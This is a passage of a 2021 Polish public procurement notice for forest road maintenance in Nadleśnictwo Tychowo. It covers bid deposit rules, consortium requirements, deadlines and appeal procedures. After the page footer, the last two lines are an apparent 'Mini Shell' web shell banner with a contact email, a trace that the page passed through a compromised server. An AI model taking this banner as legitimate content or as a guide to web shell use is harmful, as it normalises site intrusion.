oszczędnościowo-kredytowej potwierdzającej wysokość<br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 6.1. i 6.3 Zamawiający<br/>przed udzieleniem zamówienia, działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę,<br/>którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie<br/>aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) PZP, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę<br/>albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do<br/>tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o<br/>przynależności lub braku przynależności do tej grupy kapitałowej stanowi załącznik nr 5 do SWZ),<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków<br/>dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W celu wstępnego potwierdzenia braku podstaw do wykluczenia z postępowania, o których<br/>mowa w pkt 6.1. i 6.3 oraz w celu potwierdzenia spełniania warunków udziału w postępowaniu, o<br/>których mowa w pkt 7.1 SWZ. Wykonawca składa wraz z ofertą oświadczenia, o których mowa<br/>w art. 125 ust. 1 PZP, tj. wstępne oświadczenie o spełnianiu warunków udziału, sporządzone<br/>zgodnie ze wzorem stanowiącym załącznik nr 9 do SWZ oraz wstępne oświadczenie o braku<br/>podstaw do wykluczenia, sporządzone zgodne ze wzorem stanowiącym załącznik nr 8 do SWZ.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w zdaniu poprzednim, także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu (zgodnie ze wzorem stanowiącym załącznik nr 7 do SWZ) oraz odpowiednio<br/>spełnianie warunków udziału w, w zakresie, w jakim wykonawca powołuje się na jego zasoby<br/>(zgodnie ze wzorem stanowiącym załącznik nr 6 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 5 tys. (słownie: pięć tysięcy 00/100)<br/>złotych. Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do<br/>dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1<br/>pkt 2 i 3 oraz ust. 2 PZP.<br/>11.2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.:<br/>Dz. U. z 2020 r. poz. 299).<br/>11.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w banku BGŻ BNP PARIBAS nr rachunku: 08 2030 0045 1110 0000 0215 5980<br/>z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na „Naprawa i konserwacja<br/>gruntowych dróg leśnych w Nadleśnictwie Tychowo” Wniesienie wadium w pieniądzu będzie<br/>skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym<br/>Zamawiającego. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku<br/>bankowym.<br/>Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub<br/>poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać<br/>bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie<br/>związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-4)<br/>należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj.<br/>opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia.<br/>Wadium musi zabezpieczać ofertę na całość zamówienia przez cały okres związania ofertą.<br/>Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub<br/>nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży<br/>wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie<br/>odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP w zw, z art. 266 PZP.<br/>Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego),<br/>gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz<br/>wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie<br/>przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty<br/>gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach<br/>określonych w art. 98 ust. 6 PZP.<br/>Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać<br/>umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) oświadczenie, o którym mowa w art. 125 ust. 1 PZP składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu. Ww. oświadczenie wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia powinno zostać złożone wraz z ofertą pod<br/>rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem<br/>elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.<br/>4) dokumenty, o których mowa w pkt 9.3. obowiązany będzie złożyć każdy z wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia<br/>5) dokumenty, o których mowa w pkt 9.2. lit. a, c wykonawcy wspólnie ubiegający się o<br/>zamówienie składają wspólnie, natomiast dokumenty, o których mowa w pkt 9.2. lit. b składa ten<br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia, który wykazuje spełnienie<br/>warunku udziału w postępowaniu, do którego wykazania służy dany dokument;<br/>6) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy;<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie<br/>Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania<br/>poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>8) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w<br/>całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia łącznie lub każdego z osobna.<br/>9) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu<br/>do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W związku z powyższym Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek<br/>dowodowy w postaci oświadczenia, z którego wynika, które usługi wykonają poszczególni<br/>Wykonawcy. Wzór stosownego oświadczenia został zawarty w formularzu ofertowym<br/>stanowiącym załącznik nr 1 i Zamawiający zaleca złożyć to oświadczenie właśnie w tym<br/>formularzu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewiduje<br/>możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności w niej<br/>wymienionych z uwzględnieniem podanych we wzorze umowy warunków ich wprowadzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy (SmartPZP)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia<br/>oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów<br/>PZP, przysługują środki ochrony prawnej określone w dziale IX PZP tj. odwołanie i skarga do<br/>sądu. Postępowanie odwoławcze uregulowane zostało w przepisach art. 506-578 PZP, a<br/>postępowanie skargowe w przepisach art.. 579-590 PZP.Odwołanie przysługuje na:<br/>1) niezgodną z przepisami PZP czynność Zamawiającego, podjętą w postępowaniu o udzielenie<br/>zamówienia, w tym na projektowane postanowienie umowy;<br/>2) zaniechanie czynności w postępowaniu o udzielenie zamówienia, do której Zamawiający był<br/>obowiązany na podstawie PZP;<br/>3) zaniechanie przeprowadzenia postępowania o udzielenie zamówienia, mimo że Zamawiający<br/>był do tego obowiązany.<br/>Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczej. Odwołujący przekazuje<br/>Zamawiającemu odwołanie wniesione w formie elektronicznej albo postaci elektronicznej albo<br/>kopię tego odwołania, jeżeli zostało ono wniesione w formie pisemnej, przed upływem terminu<br/>do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem<br/>tego terminu. Domniemywa się, że Zamawiający mógł zapoznać się z treścią odwołania przed<br/>upływem terminu do jego wniesienia, jeżeli przekazanie odpowiednio odwołania albo jego kopii<br/>nastąpiło przed upływem terminu do jego wniesienia przy użyciu środków komunikacji<br/>elektronicznej.<br/>Odwołanie wnosi się w terminie: (a) 5 dni od dnia przekazania informacji o czynności<br/>Zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została przekazana<br/>przy użyciu środków komunikacji elektronicznej, (b) 10 dni od dnia przekazania informacji o<br/>czynności Zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została<br/>przekazana w sposób inny niż określony w lit. (a).<br/>Odwołanie wobec treści ogłoszenia wszczynającego postępowanie o udzielenie zamówienia lub<br/>wobec treści dokumentów zamówienia wnosi się w terminie 5 dni od dnia zamieszczenia<br/>ogłoszenia w Biuletynie Zamówień Publicznych lub zamieszczenia dokumentów zamówienia na<br/>stronie internetowej.<br/>Odwołanie w przypadkach innych niż określone w pkt 19.4. i 19.5 SWZ wnosi się w terminie 5<br/>dni od dnia, w którym powzięto lub przy zachowaniu należytej staranności można było powziąć<br/>wiadomość o okolicznościach stanowiących podstawę jego wniesienia.<br/>Na orzeczenie Krajowej Izby Odwoławczej oraz postanowienie Prezesa Krajowej Izby<br/>Odwoławczej, o którym mowa w art. 519 ust. 1 PZP, stronom oraz uczestnikom postępowania<br/>przysługuje skarga do sądu. Skargę wnosi się do Sądu Okręgowego w Warszawie - sądu<br/>zamówień publicznych. Skargę wnosi się za pośrednictwem Prezesa Krajowej Izby<br/>Odwoławczej, w terminie 14 dni od dnia doręczenia orzeczenia Krajowej Izby Odwoławczej lub<br/>postanowienia Prezesa Krajowej Izby Odwoławczej, o którym mowa w art. 519 ust. 1 PZP,<br/>przesyłając jednocześnie jej odpis przeciwnikowi skargi. Złożenie skargi w placówce pocztowej<br/>operatora wyznaczonego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe<br/>(tekst jedn. Dz. U. z 2020 r. poz. 1041 z późn. zm.) jest równoznaczne z jej wniesieniem.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-27 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com